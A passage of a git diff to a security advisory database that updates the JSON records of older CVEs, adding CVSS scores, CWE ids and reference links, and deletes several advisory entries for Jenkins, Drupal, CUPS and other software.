newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json b/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json index ce07431d6b36d..66ebe71f65907 100644 --- a/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json +++ b/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p9m6-v44h-ccmx", - "modified": "2022-05-24T22:00:14Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-24T22:00:14Z", "aliases": [ "CVE-2019-1010006" ], "details": "Evince 3.26.0 is affected by buffer overflow. The impact is: DOS / Possible code execution. The component is: backend/tiff/tiff-document.c. The attack vector is: Victin must open a crafted PDF file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -53,7 +56,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json b/advisories/unreviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json deleted file mode 100644 index 9c07478f95220..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pjmx-4gc6-hwv8", - "modified": "2022-05-17T05:48:23Z", - "published": "2022-05-17T05:48:23Z", - "aliases": [ - "CVE-2010-3094" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.18 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) an action description, (2) an action message, (3) a node, or (4) a taxonomy term, related to the actions feature and the trigger module.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3094" - }, - { - "type": "WEB", - "url": "http://drupal.org/node/880476" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=128418560705305&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=128440896914512&w=2" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2113" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/42391" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-09-21T20:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json b/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json index fdf210acab23a..a02d302c51f94 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json +++ b/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pmrr-7vvq-vpj6", - "modified": "2022-05-02T03:17:55Z", + "modified": "2024-02-02T18:30:21Z", "published": "2022-05-02T03:17:55Z", "aliases": [ "CVE-2009-0749" ], "details": "Use-after-free vulnerability in the GIFReadNextExtension function in lib/pngxtern/gif/gifread.c in OptiPNG 0.6.2 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a crafted GIF image that causes the realloc function to return a new pointer, which triggers memory corruption when the old pointer is accessed.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -77,7 +80,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json b/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json index f27b0921d4330..7132777ecad4a 100644 --- a/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json +++ b/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pp56-6c5p-hfmv", - "modified": "2022-05-17T02:05:47Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-17T02:05:47Z", "aliases": [ "CVE-2010-2941" ], "details": "ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate memory for attribute values with invalid string data types, which allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly execute arbitrary code via a crafted IPP request.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -137,7 +140,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json b/advisories/unreviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json deleted file mode 100644 index 7b4f06a158d42..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pqqj-299w-wf53", - "modified": "2022-05-24T17:27:18Z", - "published": "2022-05-24T17:27:18Z", - "aliases": [ - "CVE-2020-23814" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-23814" - }, - { - "type": "WEB", - "url": "https://github.com/xuxueli/xxl-job/issues/1866" - }, - { - "type": "WEB", - "url": "https://www.ccsq8.com/issues.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-09-03T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json b/advisories/unreviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json deleted file mode 100644 index 8d992305167e8..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pqwc-3vhw-qcvq", - "modified": "2022-05-24T17:37:25Z", - "published": "2022-05-24T17:37:25Z", - "aliases": [ - "CVE-2020-28278" - ], - "details": "Prototype pollution vulnerability in 'shvl' versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28278" - }, - { - "type": "WEB", - "url": "https://github.com/robinvdvleuten/shvl/blob/bef0a3ebade444cc6b297147ecf5242308f0892e/index.js#L10" - }, - { - "type": "WEB", - "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28278" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-12-29T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json b/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json index 7443c7d22247c..5aed6adb2c217 100644 --- a/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json +++ b/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json @@ -50,6 +50,10 @@ "type": "WEB", "url": "http://www.debian.org/security/2014/dsa-2939" }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" + }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1030270" diff --git a/advisories/unreviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json b/advisories/unreviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json deleted file mode 100644 index ecf4a4cf5805c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pv88-89rq-9fg6", - "modified": "2023-10-25T18:31:25Z", - "published": "2022-05-24T16:52:46Z", - "aliases": [ - "CVE-2019-10389" - ], - "details": "A missing permission check in Jenkins Relution Enterprise Appstore Publisher Plugin 1.24 and earlier allows attackers to have Jenkins initiate an HTTP connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10389" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1053" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json b/advisories/unreviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json deleted file mode 100644 index fdfd616c370cb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pvjh-7h8q-q56r", - "modified": "2022-05-14T02:42:23Z", - "published": "2022-05-14T02:42:23Z", - "aliases": [ - "CVE-2010-4312" - ], - "details": "The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4312" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/514866/100/0/threaded" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-11-26T20:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json b/advisories/unreviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json deleted file mode 100644 index e05f8fc40fa17..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pwvj-6phx-qv8c", - "modified": "2022-05-14T03:45:49Z", - "published": "2022-05-14T03:45:49Z", - "aliases": [ - "CVE-2018-1000014" - ], - "details": "Jenkins Translation Assistance Plugin 1.15 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to override localized strings displayed to all users on the current Jenkins instance if the victim is a Jenkins administrator.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000014" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/102809" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json b/advisories/unreviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json deleted file mode 100644 index 040f94913cf51..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-px35-882c-47hw", - "modified": "2023-10-25T18:31:21Z", - "published": "2022-05-24T22:00:03Z", - "aliases": [ - "CVE-2019-10326" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attackers to reset warning counts for future builds.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10326" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1391" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/108540" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-05-31T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json b/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json index 530eeb435ef5d..0417037d2ef54 100644 --- a/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json +++ b/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-311" + "CWE-311", + "CWE-614" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json b/advisories/unreviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json deleted file mode 100644 index ec6b9b7f5eb03..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-q4xc-7cw8-cgfj", - "modified": "2022-05-24T17:37:26Z", - "published": "2022-05-24T17:37:26Z", - "aliases": [ - "CVE-2020-28277" - ], - "details": "Prototype pollution vulnerability in 'dset' versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28277" - }, - { - "type": "WEB", - "url": "https://github.com/lukeed/dset/blob/50a6ead172d1466a96035eff00f8eb465ccd050a/src/index.js#L6" - }, - { - "type": "WEB", - "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-12-29T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json b/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json index c0333456d0041..431f4f5eed35c 100644 --- a/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json +++ b/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q534-42fm-gqr8", - "modified": "2022-05-01T18:13:08Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-05-01T18:13:08Z", "aliases": [ "CVE-2007-3365" ], "details": "MyServer 0.8.9 and earlier does not properly handle uppercase characters in filename extensions, which allows remote attackers to obtain sensitive information (script source code) via a modified extension, as demonstrated by post.mscgI.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json b/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json index 8cdbfe540b9d5..50716e4cd850f 100644 --- a/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json +++ b/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q7q8-g4m3-j3pq", - "modified": "2022-05-02T03:43:39Z", + "modified": "2024-02-08T15:30:26Z", "published": "2022-05-02T03:43:39Z", "aliases": [ "CVE-2009-3289" ], "details": "The g_file_copy function in glib 2.0 sets the permissions of a target file to the permissions of a symbolic link (777), which allows user-assisted local users to modify files of other users, as demonstrated by using Nautilus to modify the permissions of the user home directory.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-732" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json b/advisories/unreviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json deleted file mode 100644 index 31435367367c0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-q83c-64c9-c42m", - "modified": "2022-05-17T19:57:15Z", - "published": "2022-05-17T19:57:15Z", - "aliases": [ - "CVE-2014-5012" - ], - "details": "DOMPDF before 0.6.2 allows denial of service.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5012" - }, - { - "type": "WEB", - "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2" - }, - { - "type": "WEB", - "url": "https://github.com/dompdf/dompdf/releases/tag/v0.6.2" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-01-10T06:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json b/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json index 6fba196ea6ede..23bdbccd1a6e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json +++ b/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q868-g69p-72cw", - "modified": "2022-05-24T17:33:09Z", + "modified": "2024-02-03T09:30:16Z", "published": "2022-05-24T17:33:09Z", "aliases": [ "CVE-2020-28049" ], "details": "An issue was discovered in SDDM before 0.19.0. It incorrectly starts the X server in a way that - for a short time period - allows local unprivileged users to create a connection to the X server without providing proper authentication. A local attacker can thus access X server display contents and, for example, intercept keystrokes or access the clipboard. This is caused by a race condition during Xauthority file creation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" + } ], "affected": [ @@ -34,10 +37,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00009.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GT3EX5NSQJJAKY63ENSMEDX6NYZLYY3S/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GT3EX5NSQJJAKY63ENSMEDX6NYZLYY3S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-02" + }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4783" diff --git a/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json b/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json index c26d378462852..f530e6850fd86 100644 --- a/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json +++ b/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q94h-vc2h-j68g", - "modified": "2022-05-01T01:47:40Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-05-01T01:47:40Z", "aliases": [ "CVE-2005-0199" ], "details": "Integer underflow in the Lists_MakeMask() function in lists.c in ngIRCd before 0.8.2 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MODE line that causes an incorrect length calculation, which leads to a buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -53,7 +56,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json b/advisories/unreviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json deleted file mode 100644 index 3812766dc6a6e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qc3m-6xmq-7hrj", - "modified": "2022-05-13T01:31:33Z", - "published": "2022-05-13T01:31:33Z", - "aliases": [ - "CVE-2019-10289" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10289" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json b/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json index 776099f2de210..7cf293abe56eb 100644 --- a/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json +++ b/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json @@ -41,6 +41,14 @@ "type": "WEB", "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/qt/OSV-2021-903.yaml" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/36VN2WKMNQUSTF6ZW2X52NPAJVXJ4S5I/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HY5YCSDCTLHVMP3OXOM6HNTWHV6DBHDX/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36VN2WKMNQUSTF6ZW2X52NPAJVXJ4S5I/" @@ -49,6 +57,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HY5YCSDCTLHVMP3OXOM6HNTWHV6DBHDX/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-03" + }, { "type": "WEB", "url": "https://wiki.qt.io/Qt_5.15_Release#Known_Issues" diff --git a/advisories/unreviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json b/advisories/unreviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json deleted file mode 100644 index 293d35b7159fb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qg7x-4h4q-3m49", - "modified": "2022-05-24T17:06:12Z", - "published": "2022-05-24T17:06:12Z", - "aliases": [ - "CVE-2015-1811" - ], - "details": "XML external entity (XXE) vulnerability in CloudBees Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via a crafted XML document.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1811" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205632" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2015-02-27/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-01-15T19:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json b/advisories/unreviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json deleted file mode 100644 index 03cc49a8946f9..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qh3m-c6hw-5hmv", - "modified": "2023-10-25T18:31:31Z", - "published": "2022-05-24T17:03:47Z", - "aliases": [ - "CVE-2019-16556" - ], - "details": "Jenkins Rundeck Plugin 3.6.5 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16556" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1636" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-12-17T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json 